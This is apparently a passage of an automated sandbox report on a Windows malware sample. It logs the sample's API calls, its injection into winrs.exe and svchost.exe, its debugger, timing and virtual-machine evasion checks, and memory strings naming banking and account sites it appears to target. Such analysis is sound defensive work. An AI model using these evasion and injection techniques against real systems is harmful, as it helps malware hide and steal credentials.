                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0090EB42
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0091123A
                Source: C:\Users\user\Desktop\A2028041200SD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\A2028041200SD.exe | API/Special instruction interceptor: Address: 12778AC
                Source: C:\Windows\SysWOW64\winrs.exe | API/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\winrs.exe | API/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\winrs.exe | API/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\winrs.exe | API/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\winrs.exe | API/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\winrs.exe | API/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\winrs.exe | API/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\winrs.exe | API/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F7096E rdtsc 8_2_02F7096E
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Evaded block: after key decision graph_0-87518
                Source: C:\Users\user\Desktop\A2028041200SD.exe | API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116 | Thread sleep time: -65000s >= -30000s
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116 | Thread sleep count: 31 > 30
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116 | Thread sleep time: -46500s >= -30000s
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116 | Thread sleep count: 31 > 30
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe TID: 8116 | Thread sleep time: -31000s >= -30000s
                Source: C:\Windows\SysWOW64\winrs.exe TID: 7988 | Thread sleep count: 46 > 30
                Source: C:\Windows\SysWOW64\winrs.exe TID: 7988 | Thread sleep time: -92000s >= -30000s
                Source: C:\Windows\SysWOW64\winrs.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00936CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00936CA9
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_009360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009360DD
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_009363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009363F9
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0093EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093EB60
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0093F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0093F5FA
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0093F56F FindFirstFileW,FindClose,0_2_0093F56F
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00941B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00941B2F
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00941C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00941C8A
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00941F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00941F94
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0090DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0090DDC0
                Source: -4EF4J77B.10.dr | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: -4EF4J77B.10.dr | Binary or memory string: tasks.office.comVMware20,11696501413o
                Source: -4EF4J77B.10.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: -4EF4J77B.10.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: -4EF4J77B.10.dr | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: -4EF4J77B.10.dr | Binary or memory string: dev.azure.comVMware20,11696501413j
                Source: -4EF4J77B.10.dr | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: -4EF4J77B.10.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: -4EF4J77B.10.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: -4EF4J77B.10.dr | Binary or memory string: bankofamerica.comVMware20,11696501413x
                Source: -4EF4J77B.10.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: -4EF4J77B.10.dr | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: -4EF4J77B.10.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: -4EF4J77B.10.dr | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: winrs.exe, 0000000A.00000002.3122304267.0000000000836000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: -4EF4J77B.10.dr | Binary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: -4EF4J77B.10.dr | Binary or memory string: outlook.office.comVMware20,11696501413s
                Source: -4EF4J77B.10.dr | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: firefox.exe, 0000000D.00000002.1692503564.0000021577A3C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: -4EF4J77B.10.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: -4EF4J77B.10.dr | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: -4EF4J77B.10.dr | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: -4EF4J77B.10.dr | Binary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: -4EF4J77B.10.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: -4EF4J77B.10.dr | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: zJGHFZpQDL.exe, 00000009.00000002.3123505923.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.(
                Source: -4EF4J77B.10.dr | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: -4EF4J77B.10.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: -4EF4J77B.10.dr | Binary or memory string: global block list test formVMware20,11696501413
                Source: -4EF4J77B.10.dr | Binary or memory string: outlook.office365.comVMware20,11696501413t
                Source: -4EF4J77B.10.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: -4EF4J77B.10.dr | Binary or memory string: interactiveuserers.comVMware20,11696501413
                Source: -4EF4J77B.10.dr | Binary or memory string: discord.comVMware20,11696501413f
                Source: -4EF4J77B.10.dr | Binary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\A2028041200SD.exe | API call chain: ExitProcess graph end node graph_0-87198
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\winrs.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F7096E rdtsc 8_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_024C7543 LdrLoadDll,8_2_024C7543
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00946AAF BlockInput,0_2_00946AAF
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_008F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008F3D19
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00923920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00923920
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0090E01E LoadLibraryA,GetProcAddress,0_2_0090E01E
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_012764E8 mov eax, dword ptr fs:[00000030h] 0_2_012764E8
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_01277B18 mov eax, dword ptr fs:[00000030h] 0_2_01277B18
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_01277B78 mov eax, dword ptr fs:[00000030h] 0_2_01277B78
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F402E1 mov eax, dword ptr fs:[00000030h] 8_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 8_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F402A0 mov eax, dword ptr fs:[00000030h] 8_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 8_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FC62A0 mov ecx, dword ptr fs:[00000030h] 8_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F6E284 mov eax, dword ptr fs:[00000030h] 8_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FB0283 mov eax, dword ptr fs:[00000030h] 8_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h] 8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F34260 mov eax, dword ptr fs:[00000030h] 8_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F2826B mov eax, dword ptr fs:[00000030h] 8_2_02F2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A250 mov eax, dword ptr fs:[00000030h]8_2_02F2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36259 mov eax, dword ptr fs:[00000030h]8_2_02F36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEA250 mov eax, dword ptr fs:[00000030h]8_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEA250 mov eax, dword ptr fs:[00000030h]8_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB8243 mov eax, dword ptr fs:[00000030h]8_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB8243 mov ecx, dword ptr fs:[00000030h]8_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2823B mov eax, dword ptr fs:[00000030h]8_2_02F2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]8_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]8_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]8_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F663FF mov eax, dword ptr fs:[00000030h]8_2_02F663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE3DB mov eax, dword ptr fs:[00000030h]8_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE3DB mov eax, dword ptr fs:[00000030h]8_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]8_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE3DB mov eax, dword ptr fs:[00000030h]8_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD43D4 mov eax, dword ptr fs:[00000030h]8_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD43D4 mov eax, dword ptr fs:[00000030h]8_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEC3CD mov eax, dword ptr fs:[00000030h]8_2_02FEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F383C0 mov eax, dword ptr fs:[00000030h]8_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F383C0 mov eax, dword ptr fs:[00000030h]8_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F383C0 mov eax, dword ptr fs:[00000030h]8_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F383C0 mov eax, dword ptr fs:[00000030h]8_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F28397 mov eax, dword ptr fs:[00000030h]8_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F28397 mov eax, dword ptr fs:[00000030h]8_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F28397 mov eax, dword ptr fs:[00000030h]8_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2E388 mov eax, dword ptr fs:[00000030h]8_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2E388 mov eax, dword ptr fs:[00000030h]8_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2E388 mov eax, dword ptr fs:[00000030h]8_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5438F mov eax, dword ptr fs:[00000030h]8_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5438F mov eax, dword ptr fs:[00000030h]8_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD437C mov eax, dword ptr fs:[00000030h]8_2_02FD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov ecx, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFA352 mov eax, dword ptr fs:[00000030h]8_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD8350 mov ecx, dword ptr fs:[00000030h]8_2_02FD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2C310 mov ecx, dword ptr fs:[00000030h]8_2_02F2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F50310 mov ecx, dword ptr fs:[00000030h]8_2_02F50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A30B mov eax, dword ptr fs:[00000030h]8_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A30B mov eax, dword ptr fs:[00000030h]8_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A30B mov eax, dword ptr fs:[00000030h]8_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]8_2_02F2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F720F0 mov ecx, dword ptr fs:[00000030h]8_2_02F720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]8_2_02F2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F380E9 mov eax, dword ptr fs:[00000030h]8_2_02F380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB60E0 mov eax, dword ptr fs:[00000030h]8_2_02FB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB20DE mov eax, dword ptr fs:[00000030h]8_2_02FB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF60B8 mov eax, dword ptr fs:[00000030h]8_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]8_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC80A8 mov eax, dword ptr fs:[00000030h]8_2_02FC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3208A mov eax, dword ptr fs:[00000030h]8_2_02F3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5C073 mov eax, dword ptr fs:[00000030h]8_2_02F5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F32050 mov eax, dword ptr fs:[00000030h]8_2_02F32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB6050 mov eax, dword ptr fs:[00000030h]8_2_02FB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC6030 mov eax, dword ptr fs:[00000030h]8_2_02FC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A020 mov eax, dword ptr fs:[00000030h]8_2_02F2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2C020 mov eax, dword ptr fs:[00000030h]8_2_02F2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E016 mov eax, dword ptr fs:[00000030h]8_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E016 mov eax, dword ptr fs:[00000030h]8_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E016 mov eax, dword ptr fs:[00000030h]8_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E016 mov eax, dword ptr fs:[00000030h]8_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_030061E5 mov eax, dword ptr fs:[00000030h]8_2_030061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB4000 mov ecx, dword ptr fs:[00000030h]8_2_02FB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F601F8 mov eax, dword ptr fs:[00000030h]8_2_02F601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF61C3 mov eax, dword ptr fs:[00000030h]8_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF61C3 mov eax, dword ptr fs:[00000030h]8_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB019F mov eax, dword ptr fs:[00000030h]8_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB019F mov eax, dword ptr fs:[00000030h]8_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB019F mov eax, dword ptr fs:[00000030h]8_2_02FB019F
